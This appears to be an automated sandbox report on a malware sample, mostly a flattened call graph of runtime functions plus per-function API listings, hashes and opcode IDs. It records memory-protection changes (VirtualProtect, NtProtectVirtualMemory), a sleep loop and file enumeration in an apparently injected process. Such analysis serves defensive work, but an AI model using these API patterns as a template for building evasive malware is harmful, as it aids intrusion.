22c96a3d 6665->6668 6666 22c96a26 6667 22c96a2b GetACP 6666->6667 6666->6668 6667->6668 6668->6620 6669 22c956d0 6668->6669 6670 22c9570e 6669->6670 6671 22c956de _abort 6669->6671 6672 22c96368 __dosmaperr 20 API calls 6670->6672 6671->6670 6673 22c956f9 RtlAllocateHeap 6671->6673 6675 22c9474f _abort 7 API calls 6671->6675 6674 22c9570c 6672->6674 6673->6671 6673->6674 6674->6623 6676 22c96e20 6674->6676 6675->6671 6677 22c969f3 40 API calls 6676->6677 6678 22c96e3f 6677->6678 6680 22c96e90 IsValidCodePage 6678->6680 6683 22c96e46 6678->6683 6685 22c96eb5 ___scrt_fastfail 6678->6685 6679 22c92ada _ValidateLocalCookies 5 API calls 6681 22c96cc1 6679->6681 6682 22c96ea2 GetCPInfo 6680->6682 6680->6683 6681->6627 6681->6630 6682->6683 6682->6685 6683->6679 6904 22c96acb GetCPInfo 6685->6904 6977 22c96886 6686->6977 6688 22c968ed 6688->6623 6700 22c97613 6689->6700 6692 22c955b8 6694 22c955c2 IsProcessorFeaturePresent 6692->6694 6699 22c955e0 6692->6699 6696 22c955cd 6694->6696 6730 22c960e2 6696->6730 6736 22c94bc1 6699->6736 6739 22c97581 6700->6739 6703 22c9766e 6704 22c9767a _abort 6703->6704 6705 22c95b7a __dosmaperr 20 API calls 6704->6705 6710 22c976a7 _abort 6704->6710 6711 22c976a1 _abort 6704->6711 6705->6711 6706 22c976f3 6707 22c96368 __dosmaperr 20 API calls 6706->6707 6709 22c976f8 6707->6709 6708 22c976d6 6765 22c9bdc9 6708->6765 6753 22c962ac 6709->6753 6716 22c9771f 6710->6716 6756 22c95671 RtlEnterCriticalSection 6710->6756 6711->6706 6711->6708 6711->6710 6717 22c9777e 6716->6717 6719 22c97776 6716->6719 6728 22c977a9 6716->6728 6757 22c956b9 RtlLeaveCriticalSection 6716->6757 6717->6728 6758 22c97665 6717->6758 6722 22c94bc1 _abort 28 API calls 6719->6722 6722->6717 6724 22c95af6 _abort 38 API calls 6726 22c9780c 6724->6726 6726->6708 6729 22c95af6 _abort 38 API calls 6726->6729 6727 22c97665 _abort 38 API calls 6727->6728 6761 22c9782e 6728->6761 6729->6708 6731 22c960fe ___scrt_fastfail 6730->6731 6732 22c9612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6731->6732 6735 22c961fb ___scrt_fastfail 6732->6735 6733 22c92ada _ValidateLocalCookies 5 API calls 6734 22c96219 6733->6734 6734->6699 6735->6733 6784 22c9499b 6736->6784 6742 22c97527 6739->6742 6741 22c955ad 6741->6692 6741->6703 6743 22c97533 ___scrt_is_nonwritable_in_current_image 6742->6743 6748 22c95671 RtlEnterCriticalSection 6743->6748 6745 22c97541 6749 22c97575 6745->6749 6747 22c97568 _abort 6747->6741 6748->6745 6752 22c956b9 RtlLeaveCriticalSection 6749->6752 6751 22c9757f 6751->6747 6752->6751 6768 22c96231 6753->6768 6755 22c962b8 6755->6708 6756->6716 6757->6719 6759 22c95af6 _abort 38 API calls 6758->6759 6760 22c9766a 6759->6760 6760->6727 6762 22c977fd 6761->6762 6763 22c97834 6761->6763 6762->6708 6762->6724 6762->6726 6783 22c956b9 RtlLeaveCriticalSection 6763->6783 6766 22c92ada _ValidateLocalCookies 5 API calls 6765->6766 6767 22c9bdd4 6766->6767 6767->6767 6769 22c95b7a __dosmaperr 20 API calls 6768->6769 6770 22c96247 6769->6770 6771 22c96255 6770->6771 6772 22c962a6 6770->6772 6776 22c92ada _ValidateLocalCookies 5 API calls 6771->6776 6779 22c962bc IsProcessorFeaturePresent 6772->6779 6774 22c962ab 6775 22c96231 _abort 26 API calls 6774->6775 6777 22c962b8 6775->6777 6778 22c9627c 6776->6778 6777->6755 6778->6755 6780 22c962c7 6779->6780 6781 22c960e2 _abort 8 API calls 6780->6781 6782 22c962dc GetCurrentProcess TerminateProcess 6781->6782 6782->6774 6783->6762 6785 22c949a7 _abort 6784->6785 6786 22c949bf 6785->6786 6806 22c94af5 GetModuleHandleW 6785->6806 6815 22c95671 RtlEnterCriticalSection 6786->6815 6793 22c94a3c 6794 22c94a54 6793->6794 6819 22c94669 6793->6819 6800 22c94669 _abort 5 API calls 6794->6800 6795 22c94aae 6798 22c9bdc9 _abort 5 API calls 6795->6798 6796 22c94a82 6826 22c94ab4 6796->6826 6803 22c94ab3 6798->6803 6804 22c94a65 6800->6804 6801 22c949c7 6801->6793 6801->6804 6816 22c9527a 6801->6816 6823 22c94aa5 6804->6823 6807 22c949b3 6806->6807 6807->6786 6808 22c94b39 GetModuleHandleExW 6807->6808 6809 22c94b63 GetProcAddress 6808->6809 6810 22c94b78 6808->6810 6809->6810 6811 22c94b8c FreeLibrary 6810->6811 6812 22c94b95 6810->6812 6811->6812 6813 22c92ada _ValidateLocalCookies 5 API calls 6812->6813 6814 22c94b9f 6813->6814 6814->6786 6815->6801 6834 22c95132 6816->6834 6820 22c94698 6819->6820 6821 22c92ada _ValidateLocalCookies 5 API calls 6820->6821 6822 22c946c1 6821->6822 6822->6794 6855 22c956b9 RtlLeaveCriticalSection 6823->6855 6825 22c94a7e 6825->6795 6825->6796 6856 22c96025 6826->6856 6829 22c94ae2 6832 22c94b39 _abort 8 API calls 6829->6832 6830 22c94ac2 GetPEB 6830->6829 6831 22c94ad2 GetCurrentProcess TerminateProcess 6830->6831 6831->6829 6833 22c94aea ExitProcess 6832->6833 6837 22c950e1 6834->6837 6836 22c95156 6836->6793 6838 22c950ed ___scrt_is_nonwritable_in_current_image 6837->6838 6845 22c95671 RtlEnterCriticalSection 6838->6845 6840 22c950fb 6846 22c9515a 6840->6846 6844 22c95119 _abort 6844->6836 6845->6840 6849 22c95182 6846->6849 6850 22c9517a 6846->6850 6847 22c92ada _ValidateLocalCookies 5 API calls 6848 22c95108 6847->6848 6852 22c95126 6848->6852 6849->6850 6851 22c9571e _free 20 API calls 6849->6851 6850->6847 6851->6850 6853 22c956b9 _abort RtlLeaveCriticalSection 6852->6853 6854 22c95130 6853->6854 6854->6844 6855->6825 6857 22c9604a 6856->6857 6861 22c96040 6856->6861 6858 22c95c45 _abort 5 API calls 6857->6858 6858->6861 6859 22c92ada _ValidateLocalCookies 5 API calls 6860 22c94abe 6859->6860 6860->6829 6860->6830 6861->6859 6862->6660 6866 22c956b9 RtlLeaveCriticalSection 6863->6866 6865 22c96e16 6865->6660 6866->6865 6868 22c954ba 6867->6868 6869 22c954c4 6867->6869 6868->6665 6868->6666 6869->6868 6870 22c95af6 _abort 38 API calls 6869->6870 6871 22c954e5 6870->6871 6875 22c97a00 6871->6875 6876 22c97a13 6875->6876 6878 22c954fe 6875->6878 6876->6878 6883 22c97f0f 6876->6883 6879 22c97a2d 6878->6879 6880 22c97a55 6879->6880 6881 22c97a40 6879->6881 6880->6868 6881->6880 6882 22c96d7e __fassign 38 API calls 6881->6882 6882->6880 6884 22c97f1b ___scrt_is_nonwritable_in_current_image 6883->6884 6885 22c95af6 _abort 38 API calls 6884->6885 6886 22c97f24 6885->6886 6887 22c97f72 _abort 6886->6887 6895 22c95671 RtlEnterCriticalSection 6886->6895 6887->6878 6889 22c97f42 6896 22c97f86 6889->6896 6894 22c955a8 _abort 38 API calls 6894->6887 6895->6889 6897 22c97f56 6896->6897 6898 22c97f94 __fassign 6896->6898 6900 22c97f75 6897->6900 6898->6897 6899 22c97cc2 __fassign 20 API calls 6898->6899 6899->6897 6903 22c956b9 RtlLeaveCriticalSection 6900->6903 6902 22c97f69 6902->6887 6902->6894 6903->6902 6909 22c96b05 6904->6909 6913 22c96baf 6904->6913 6906 22c92ada _ValidateLocalCookies 5 API calls 6908 22c96c5b 6906->6908 6908->6683 6914 22c986e4 6909->6914 6912 22c98a3e 43 API calls 6912->6913 6913->6906 6915 22c954a7 __fassign 38 API calls 6914->6915 6916 22c98704 MultiByteToWideChar 6915->6916 6918 22c98742 6916->6918 6919 22c987da 6916->6919 6922 22c956d0 21 API calls 6918->6922 6925 22c98763 ___scrt_fastfail 6918->6925 6920 22c92ada _ValidateLocalCookies 5 API calls 6919->6920 6923 22c96b66 6920->6923 6921 22c987d4 6933 22c98801 6921->6933 6922->6925 6928 22c98a3e 6923->6928 6925->6921 6926 22c987a8 MultiByteToWideChar 6925->6926 6926->6921 6927 22c987c4 GetStringTypeW 6926->6927 6927->6921 6929 22c954a7 __fassign 38 API calls 6928->6929 6930 22c98a51 6929->6930 6937 22c98821 6930->6937 6934 22c9880d 6933->6934 6935 22c9881e 6933->6935 6934->6935 6936 22c9571e _free 20 API calls 6934->6936 6935->6919 6936->6935 6939 22c9883c 6937->6939 6938 22c98862 MultiByteToWideChar 6940 22c98a16 6938->6940 6941 22c9888c 6938->6941 6939->6938 6942 22c92ada _ValidateLocalCookies 5 API calls 6940->6942 6944 22c956d0 21 API calls 6941->6944 6946 22c988ad 6941->6946 6943 22c96b87 6942->6943 6943->6912 6944->6946 6945 22c988f6 MultiByteToWideChar 6947 22c9890f 6945->6947 6959 22c98962 6945->6959 6946->6945 6946->6959 6964 22c95f19 6947->6964 6949 22c98801 __freea 20 API calls 6949->6940 6951 22c98939 6954 22c95f19 11 API calls 6951->6954 6951->6959 6952 22c98971 6955 22c956d0 21 API calls 6952->6955 6960 22c98992 6952->6960 6953 22c98a07 6957 22c98801 __freea 20 API calls 6953->6957 6954->6959 6955->6960 6956 22c95f19 11 API calls 6958 22c989e6 6956->6958 6957->6959 6958->6953 6961 22c989f5 WideCharToMultiByte 6958->6961 6959->6949 6960->6953 6960->6956 6961->6953 6962 22c98a35 6961->6962 6963 22c98801 __freea 20 API calls 6962->6963 6963->6959 6965 22c95c45 _abort 5 API calls 6964->6965 6966 22c95f40 6965->6966 6969 22c95f49 6966->6969 6972 22c95fa1 6966->6972 6970 22c92ada _ValidateLocalCookies 5 API calls 6969->6970 6971 22c95f9b 6970->6971 6971->6951 6971->6952 6971->6959 6973 22c95c45 _abort 5 API calls 6972->6973 6974 22c95fc8 6973->6974 6975 22c92ada _ValidateLocalCookies 5 API calls 6974->6975 6976 22c95f89 LCMapStringW 6975->6976 6976->6969 6978 22c96892 ___scrt_is_nonwritable_in_current_image 6977->6978 6985 22c95671 RtlEnterCriticalSection 6978->6985 6980 22c9689c 6986 22c968f1 6980->6986 6984 22c968b5 _abort 6984->6688 6985->6980 6998 22c97011 6986->6998 6988 22c9693f 6989 22c97011 26 API calls 6988->6989 6990 22c9695b 6989->6990 6991 22c97011 26 API calls 6990->6991 6992 22c96979 6991->6992 6993 22c968a9 6992->6993 6994 22c9571e _free 20 API calls 6992->6994 6995 22c968bd 6993->6995 6994->6993 7012 22c956b9 RtlLeaveCriticalSection 6995->7012 6997 22c968c7 6997->6984 6999 22c97022 6998->6999 7008 22c9701e 6998->7008 7000 22c97029 6999->7000 7003 22c9703c ___scrt_fastfail 6999->7003 7001 22c96368 __dosmaperr 20 API calls 7000->7001 7002 22c9702e 7001->7002 7004 22c962ac _abort 26 API calls 7002->7004 7005 22c9706a 7003->7005 7006 22c97073 7003->7006 7003->7008 7004->7008 7007 22c96368 __dosmaperr 20 API calls 7005->7007 7006->7008 7010 22c96368 __dosmaperr 20 API calls 7006->7010 7009 22c9706f 7007->7009 7008->6988 7011 22c962ac _abort 26 API calls 7009->7011 7010->7009 7011->7008 7012->6997 7014 22c95468 7013->7014 7015 22c9545a 7013->7015 7016 22c96368 __dosmaperr 20 API calls 7014->7016 7015->7014 7017 22c9547f 7015->7017 7021 22c95470 7016->7021 7019 22c9547a 7017->7019 7020 22c96368 __dosmaperr 20 API calls 7017->7020 7018 22c962ac _abort 26 API calls 7018->7019 7019->6600 7020->7021 7021->7018 7023 22c9500d 7022->7023 7024 22c94fd7 7022->7024 7025 22c95024 7023->7025 7027 22c9571e _free 20 API calls 7023->7027 7024->6608 7026 22c9571e _free 20 API calls 7025->7026 7026->7024 7027->7023 7196 22c9ac6b 7197 22c9ac84 __startOneArgErrorHandling 7196->7197 7199 22c9acad __startOneArgErrorHandling 7197->7199 7200 22c9b2f0 7197->7200 7201 22c9b329 __startOneArgErrorHandling 7200->7201 7203 22c9b350 __startOneArgErrorHandling 7201->7203 7211 22c9b5c1 7201->7211 7204 22c9b393 7203->7204 7205 22c9b36e 7203->7205 7224 22c9b8b2 7204->7224 7215 22c9b8e1 7205->7215 7208 22c9b38e __startOneArgErrorHandling 7209 22c92ada _ValidateLocalCookies 5 API calls 7208->7209 7210 22c9b3b7 7209->7210 7210->7199 7212 22c9b5ec __raise_exc 7211->7212 7213 22c9b7e5 RaiseException 7212->7213 7214 22c9b7fd 7213->7214 7214->7203 7216 22c9b8f0 7215->7216 7217 22c9b90f __startOneArgErrorHandling 7216->7217 7218 22c9b964 __startOneArgErrorHandling 7216->7218 7231 22c978a3 7217->7231 7220 22c9b8b2 __startOneArgErrorHandling 20 API calls 7218->7220 7223 22c9b95d 7220->7223 7222 22c9b8b2 __startOneArgErrorHandling 20 API calls 7222->7223 7223->7208 7225 22c9b8bf 7224->7225 7226 22c9b8d4 7224->7226 7228 22c9b8d9 7225->7228 7229 22c96368 __dosmaperr 20 API calls 7225->7229 7227 22c96368 __dosmaperr 20 API calls 7226->7227 7227->7228 7228->7208 7230 22c9b8cc 7229->7230 7230->7208 7232 22c978cb 7231->7232 7233 22c92ada _ValidateLocalCookies 5 API calls 7232->7233 7234 22c978e8 7233->7234 7234->7222 7234->7223 7314 22c9742b 7315 22c97430 7314->7315 7317 22c97453 7315->7317 7318 22c98bae 7315->7318 7319 22c98bbb 7318->7319 7320 22c98bdd 7318->7320 7321 22c98bc9 RtlDeleteCriticalSection 7319->7321 7322 22c98bd7 7319->7322 7320->7315 7321->7321 7321->7322 7323 22c9571e _free 20 API calls 7322->7323 7323->7320 7064 22c960ac 7065 22c960dd 7064->7065 7066 22c960b7 7064->7066 7066->7065 7067 22c960c7 FreeLibrary 7066->7067 7067->7066 7235 22c9506f 7236 22c95081 7235->7236 7238 22c95087 7235->7238 7237 22c95000 20 API calls 7236->7237 7237->7238 7489 22c921a1 ___scrt_dllmain_exception_filter 7931 22c99d61 7932 22c99d81 7931->7932 7935 22c99db8 7932->7935 7934 22c99dab 7936 22c99dbf 7935->7936 7937 22c99e20 7936->7937 7938 22c99ddf 7936->7938 7939 22c9aa17 21 API calls 7937->7939 7940 22c9a90e 7937->7940 7938->7940 7942 22c9aa17 21 API calls 7938->7942 7941 22c99e6e 7939->7941 7940->7934 7941->7934 7943 22c9a93e 7942->7943 7943->7934 7239 22c97260 GetStartupInfoW 7240 22c97318 7239->7240 7241 22c97286 7239->7241 7241->7240 7245 22c98be3 7241->7245 7243 22c972af 7243->7240 7244 22c972dd GetFileType 7243->7244 7244->7243 7246 22c98bef ___scrt_is_nonwritable_in_current_image 7245->7246 7247 22c98bfc 7246->7247 7248 22c98c13 7246->7248 7249 22c96368 __dosmaperr 20 API calls 7247->7249 7258 22c95671 RtlEnterCriticalSection 7248->7258 7251 22c98c01 7249->7251 7252 22c962ac _abort 26 API calls 7251->7252 7255 22c98c0b _abort 7252->7255 7253 22c98c1f 7257 22c98c4b 7253->7257 7259 22c98b34 7253->7259 7255->7243 7266 22c98c72 7257->7266 7258->7253 7260 22c9637b _abort 20 API calls 7259->7260 7261 22c98b46 7260->7261 7263 22c95eb7 11 API calls 7261->7263 7265 22c98b53 7261->7265 7262 22c9571e _free 20 API calls 7264 22c98ba5 7262->7264 7263->7261 7264->7253 7265->7262 7269 22c956b9 RtlLeaveCriticalSection 7266->7269 7268 22c98c79 7268->7255 7269->7268 7421 22c9a1e0 7424 22c9a1fe 7421->7424 7423 22c9a1f6 7428 22c9a203 7424->7428 7425 22c9aa53 21 API calls 7427 22c9a42f 7425->7427 7426 22c9a298 7426->7423 7427->7423 7428->7425 7428->7426 7490 22c981a0 7491 22c981d9 7490->7491 7492 22c981dd 7491->7492 7503 22c98205 7491->7503 7493 22c96368 __dosmaperr 20 API calls 7492->7493 7495 22c981e2 7493->7495 7494 22c98529 7497 22c92ada _ValidateLocalCookies 5 API calls 7494->7497 7496 22c962ac _abort 26 API calls 7495->7496 7498 22c981ed 7496->7498 7499 22c98536 7497->7499 7500 22c92ada _ValidateLocalCookies 5 API calls 7498->7500 7501 22c981f9 7500->7501 7503->7494 7504 22c980c0 7503->7504 7505 22c980db 7504->7505 7506 22c92ada _ValidateLocalCookies 5 API calls 7505->7506 7507 22c98152 7506->7507 7507->7503 6340 22c9c7a7 6341 22c9c7be 6340->6341 6350 22c9c82c 6340->6350 6341->6350 6352 22c9c7e6 GetModuleHandleA 6341->6352 6342 22c9c872 6343 22c9c835 GetModuleHandleA 6345 22c9c83f 6343->6345 6345->6345 6347 22c9c85f GetProcAddress 6345->6347 6345->6350 6346 22c9c7dd 6346->6345 6348 22c9c800 GetProcAddress 6346->6348 6346->6350 6347->6350 6349 22c9c80d VirtualProtect 6348->6349 6348->6350 6349->6350 6351 22c9c81c VirtualProtect 6349->6351 6350->6342 6350->6343 6350->6345 6351->6350 6353 22c9c7ef 6352->6353 6359 22c9c82c 6352->6359 6364 22c9c803 GetProcAddress 6353->6364 6355 22c9c872 6356 22c9c835 GetModuleHandleA 6361 22c9c83f 6356->6361 6357 22c9c7f4 6358 22c9c800 GetProcAddress 6357->6358 6357->6359 6358->6359 6360 22c9c80d VirtualProtect 6358->6360 6359->6355 6359->6356 6359->6361 6360->6359 6362 22c9c81c VirtualProtect 6360->6362 6361->6359 6363 22c9c85f GetProcAddress 6361->6363 6362->6359 6363->6359 6365 22c9c82c 6364->6365 6366 22c9c80d VirtualProtect 6364->6366 6368 22c9c872 6365->6368 6369 22c9c835 GetModuleHandleA 6365->6369 6366->6365 6367 22c9c81c VirtualProtect 6366->6367 6367->6365 6371 22c9c83f 6369->6371 6370 22c9c85f GetProcAddress 6370->6371 6371->6365 6371->6370 7324 22c9543d 7325 22c95440 7324->7325 7326 22c955a8 _abort 38 API calls 7325->7326 7327 22c9544c 7326->7327 6336 419dc2f 6339 419dc74 6336->6339 6337 419dc96 Sleep 6337->6336 6338 419dd16 NtProtectVirtualMemory 6338->6339 6339->6336 6339->6337 6339->6338 7429 22c95bff 7437 22c95d5c 7429->7437 7432 22c95b7a __dosmaperr 20 API calls 7433 22c95c1b 7432->7433 7434 22c95c28 7433->7434 7435 22c95c2b 11 API calls 7433->7435 7436 22c95c13 7435->7436 7438 22c95c45 _abort 5 API calls 7437->7438 7439 22c95d83 7438->7439 7440 22c95d9b TlsAlloc 7439->7440 7441 22c95d8c 7439->7441 7440->7441 7442 22c92ada _ValidateLocalCookies 5 API calls 7441->7442 7443 22c95c09 7442->7443 7443->7432 7443->7436 7508 22c967bf 7513 22c967f4 7508->7513 7511 22c967db 7512 22c9571e _free 20 API calls 7512->7511 7514 22c967cd 7513->7514 7515 22c96806 7513->7515 7514->7511 7514->7512 7516 22c9680b 7515->7516 7517 22c96836 7515->7517 7518 22c9637b _abort 20 API calls 7516->7518 7517->7514 7524 22c971d6 7517->7524 7519 22c96814 7518->7519 7521 22c9571e _free 20 API calls 7519->7521 7521->7514 7522 22c96851 7523 22c9571e _free 20 API calls 7522->7523 7523->7514 7525 22c971e1 7524->7525 7526 22c97209 7525->7526 7527 22c971fa 7525->7527 7528 22c97218 7526->7528 7533 22c98a98 7526->7533 7529 22c96368 __dosmaperr 20 API calls 7527->7529 7540 22c98acb 7528->7540 7532 22c971ff ___scrt_fastfail 7529->7532 7532->7522 7534 22c98ab8 RtlSizeHeap 7533->7534 7535 22c98aa3 7533->7535 7534->7528 7536 22c96368 __dosmaperr 20 API calls 7535->7536 7537 22c98aa8 7536->7537 7538 22c962ac _abort 26 API calls 7537->7538 7539 22c98ab3 7538->7539 7539->7528 7541 22c98ad8 7540->7541 7542 22c98ae3 7540->7542 7543 22c956d0 21 API calls 7541->7543 7544 22c98aeb 7542->7544 7550 22c98af4 _abort 7542->7550 7548 22c98ae0 7543->7548 7545 22c9571e _free 20 API calls 7544->7545 7545->7548 7546 22c98af9 7549 22c96368 __dosmaperr 20 API calls 7546->7549 7547 22c98b1e RtlReAllocateHeap 7547->7548 7547->7550 7548->7532 7549->7548 7550->7546 7550->7547 7551 22c9474f _abort 7 API calls 7550->7551 7551->7550 7976 22c91f3f 7977 22c91f4b ___scrt_is_nonwritable_in_current_image 7976->7977 7994 22c9247c 7977->7994 7979 22c91f52 7980 22c91f7c 7979->7980 7981 22c92041 7979->7981 7988 22c91f57 ___scrt_is_nonwritable_in_current_image 7979->7988 8005 22c923de 7980->8005 7982 22c92639 ___scrt_fastfail 4 API calls 7981->7982 7984 22c92048 7982->7984 7985 22c91f8b __RTC_Initialize 7985->7988 8008 22c922fc RtlInitializeSListHead 7985->8008 7987 22c91f99 ___scrt_initialize_default_local_stdio_options 8009 22c946c5 7987->8009 7992 22c91fb8 7992->7988 7993 22c94669 _abort 5 API calls 7992->7993 7993->7988 7995 22c92485 7994->7995 8017 22c92933 IsProcessorFeaturePresent 7995->8017 7999 22c9249a 7999->7979 8000 22c92496 8000->7999 8028 22c953c8 8000->8028 8003 22c924b1 8003->7979 8004 22c93529 ___vcrt_uninitialize 8 API calls 8004->7999 8059 22c924b5 8005->8059 8007 22c923e5 8007->7985 8008->7987 8010 22c946dc 8009->8010 8011 22c92ada _ValidateLocalCookies 5 API calls 8010->8011 8012 22c91fad 8011->8012 8012->7988 8013 22c923b3 8012->8013 8014 22c923b8 ___scrt_release_startup_lock 8013->8014 8015 22c92933 ___isa_available_init IsProcessorFeaturePresent 8014->8015 8016 22c923c1 8014->8016 8015->8016 8016->7992 8018 22c92491 8017->8018 8019 22c934ea 8018->8019 8020 22c934ef ___vcrt_initialize_winapi_thunks 8019->8020 8031 22c93936 8020->8031 8024 22c93505 8025 22c93510 8024->8025 8026 22c93972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 8024->8026 8025->8000 8027 22c934fd 8026->8027 8027->8000 8055 22c97457 8028->8055 8032 22c9393f 8031->8032 8034 22c93968 8032->8034 8035 22c934f9 8032->8035 8045 22c93be0 8032->8045 8036 22c93972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 8034->8036 8035->8027 8037 22c938e8 8035->8037 8036->8035 8050 22c93af1 8037->8050 8039 22c938fd 8039->8024 8041 22c93ba2 ___vcrt_FlsSetValue 6 API calls 8042 22c9390b 8041->8042 8043 22c93918 8042->8043 8044 22c9391b ___vcrt_uninitialize_ptd 6 API calls 8042->8044 8043->8024 8044->8039 8046 22c93a82 try_get_function 5 API calls 8045->8046 8047 22c93bfa 8046->8047 8048 22c93c18 InitializeCriticalSectionAndSpinCount 8047->8048 8049 22c93c03 8047->8049 8048->8049 8049->8032 8051 22c93a82 try_get_function 5 API calls 8050->8051 8052 22c93b0b 8051->8052 8053 22c93b24 TlsAlloc 8052->8053 8054 22c938f2 8052->8054 8054->8039 8054->8041 8058 22c97470 8055->8058 8056 22c92ada _ValidateLocalCookies 5 API calls 8057 22c924a3 8056->8057 8057->8003 8057->8004 8058->8056 8060 22c924c8 8059->8060 8061 22c924c4 8059->8061 8062 22c924d5 ___scrt_release_startup_lock 8060->8062 8063 22c92639 ___scrt_fastfail 4 API calls 8060->8063 8061->8007 8062->8007 8064 22c92559 8063->8064 7270 22c99e71 7271 22c99e95 7270->7271 7272 22c99eae 7271->7272 7275 22c9ac6b __startOneArgErrorHandling 7271->7275 7274 22c99ef8 7272->7274 7278 22c9aa53 7272->7278 7276 22c9b2f0 21 API calls 7275->7276 7277 22c9acad __startOneArgErrorHandling 7275->7277 7276->7277 7279 22c9aa70 RtlDecodePointer 7278->7279 7280 22c9aa80 7278->7280 7279->7280 7281 22c9ab0d 7280->7281 7284 22c9ab02 7280->7284 7286 22c9aab7 7280->7286 7281->7284 7285 22c96368 __dosmaperr 20 API calls 7281->7285 7282 22c92ada _ValidateLocalCookies 5 API calls 7283 22c9ac67 7282->7283 7283->7274 7284->7282 7285->7284 7286->7284 7287 22c96368 __dosmaperr 20 API calls 7286->7287 7287->7284 7328 22c95630 7330 22c9563b 7328->7330 7329 22c95eb7 11 API calls 7329->7330 7330->7329 7331 22c95664 7330->7331 7332 22c95660 7330->7332 7334 22c95688 7331->7334 7335 22c95695 7334->7335 7337 22c956b4 7334->7337 7336 22c9569f RtlDeleteCriticalSection 7335->7336 7336->7336 7336->7337 7337->7332 7444 22c963f0 7445 22c96400 7444->7445 7456 22c96416 7444->7456 7446 22c96368 __dosmaperr 20 API calls 7445->7446 7447 22c96405 7446->7447 7449 22c962ac _abort 26 API calls 7447->7449 7448 22c94e76 20 API calls 7454 22c964e5 7448->7454 7450 22c9640f 7449->7450 7452 22c964ee 7453 22c9571e _free 20 API calls 7452->7453 7455 22c96561 7453->7455 7454->7452 7460 22c96573 7454->7460 7474 22c985eb 7454->7474 7483 22c9679a 7455->7483 7456->7455 7458 22c96480 7456->7458 7463 22c96580 7456->7463 7458->7448 7461 22c962bc _abort 11 API calls 7460->7461 7462 22c9657f 7461->7462 7464 22c9658c 7463->7464 7465 22c9637b _abort 20 API calls 7464->7465 7466 22c965ba 7465->7466 7467 22c985eb 26 API calls 7466->7467 7468 22c965e6 7467->7468 7469 22c962bc _abort 11 API calls 7468->7469 7470 22c96615 ___scrt_fastfail 7469->7470 7471 22c966b6 FindFirstFileExA 7470->7471 7472 22c96705 7471->7472 7473 22c96580 26 API calls 7472->7473 7477 22c9853a 7474->7477 7475 22c9854f 7476 22c98554 7475->7476 7478 22c96368 __dosmaperr 20 API calls 7475->7478 7476->7454 7477->7475 7477->7476 7481 22c9858b 7477->7481 7479 22c9857a 7478->7479 7480 22c962ac _abort 26 API calls 7479->7480 7480->7476 7481->7476 7482 22c96368 __dosmaperr 20 API calls 7481->7482 7482->7479 7488 22c967a4 7483->7488 7484 22c967b4 7485 22c9571e _free 20 API calls 7484->7485 7487 22c967bb 7485->7487 7486 22c9571e _free 20 API calls 7486->7488 7487->7450 7488->7484 7488->7486 7944 22c93370 7955 22c93330 7944->7955 7956 22c9334f 7955->7956 7957 22c93342 7955->7957 7958 22c92ada _ValidateLocalCookies 5 API calls 7957->7958 7958->7956 7072 22c93eb3 7073 22c95411 38 API calls 7072->7073 7074 22c93ebb 7073->7074

                                                                                                                Executed Functions

                                                                                                                Function 22C910F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22C91137
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91151
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9115C
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9116D
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9117C
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22C91193
                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22C911D0
                                                                                                                • FindClose.KERNEL32(00000000), ref: 22C911DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1083526818-0
                                                                                                                • Opcode ID: 99fc194b3303979bcdac5f40b911a3186c9ffcc95016be236a1d47872c579d6c
                                                                                                                • Instruction ID: adfb9a82b32870eda77ec269c6fd22b83dcab95fc677da8eb146b97e2f944e25
                                                                                                                • Opcode Fuzzy Hash: 99fc194b3303979bcdac5f40b911a3186c9ffcc95016be236a1d47872c579d6c
                                                                                                                • Instruction Fuzzy Hash: 5C216172544348ABD710EA64DC4DFAB7BDCEF84714F000E2AB998D3190E674D615CBD6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0419DC2F Relevance: 3.1, APIs: 2, Instructions: 62sleepnativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 130 419dc2f-419dc6c 131 419dc6f-419dc7e call 419d50c 130->131 133 419dc80-419dc85 131->133 134 419dc87-419dc94 131->134 133->134 135 419dca2-419dcde 134->135 136 419dc96-419dca0 Sleep 134->136 138 419dd16-419dd2a NtProtectVirtualMemory call 419d50c 135->138 136->130 140 419dd2f-419dd42 138->140 140->130
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000005), ref: 0419DC9B
                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0419DD27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3224594364.0000000003BF6000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BF6000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_3bf6000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectSleepVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3235210055-0
